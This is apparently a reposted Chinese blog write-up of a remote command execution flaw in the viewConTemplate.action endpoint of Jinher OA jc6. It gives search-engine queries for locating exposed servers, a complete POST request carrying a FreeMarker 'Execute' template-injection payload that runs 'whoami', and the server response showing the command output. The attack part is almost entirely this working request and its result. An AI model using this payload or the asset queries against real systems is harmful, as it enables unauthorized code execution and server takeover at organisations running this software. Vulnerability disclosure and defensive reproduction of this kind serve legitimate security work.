【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

admin

102369
文章

87
评论

2024年3月18日16:05:16评论35 views字数 850阅读2分50秒阅读模式

漏洞介绍

金和OA jc6系统viewConTemplate.action接口处存在RCE漏洞，恶意攻击者可能利用此漏洞执行恶意代码命令获取服务器敏感信息，最终可能会导致服务器失陷。

资产收集

app="金和网络-金和OA"|| body="JHSoft.Web.AddMenu"|| body="/jc6/platform/"

【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

漏洞复现

【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

构造请求包

POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 0moduId=1&code=<clob>${"freemarker.template.utility.Execute"?new()("whoami")}</clob>&uuid=1

返回包

HTTP/1.1 200 OKServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=2C6413E6A110DB48387C6DC6A4D3A3C9; Path=/jc6Cache-Control: no-cacheExpires: 0Pragma: No-cacheContent-Type: text/html;charset=UTF-8Date: Mon, 18 Mar 2024 03:34:11 GMTContent-Length: 39<clob>jinher-jc6administrator</clob>

【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

原文始发于微信公众号（Devil安全）：【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

漏洞介绍

二次注入简单介绍

CVE-2024-2389 命令执行漏洞(附EXP)

CVE-2024-4040 CrushFTP 中的身份验证绕过和任意文件读取

利用 PUT 方法导致三星远程代码执行 (RCE)

泛微E-Mobile 6.0 client.do 命令执行漏洞

【在野0day】某友CRM系统某接口存在任意文件下载（大量资产存在）

【漏洞复现】短视频矩阵营销系统 ajax_uplaod接口处存在任意文件上传

漏洞速递 | Microsoft微软最新RCE漏洞（附EXP）

通达OA down 未授权员工信息泄露漏洞

漏洞预警 | FFmpeg释放后使用漏洞

发表评论

在线咨询

微信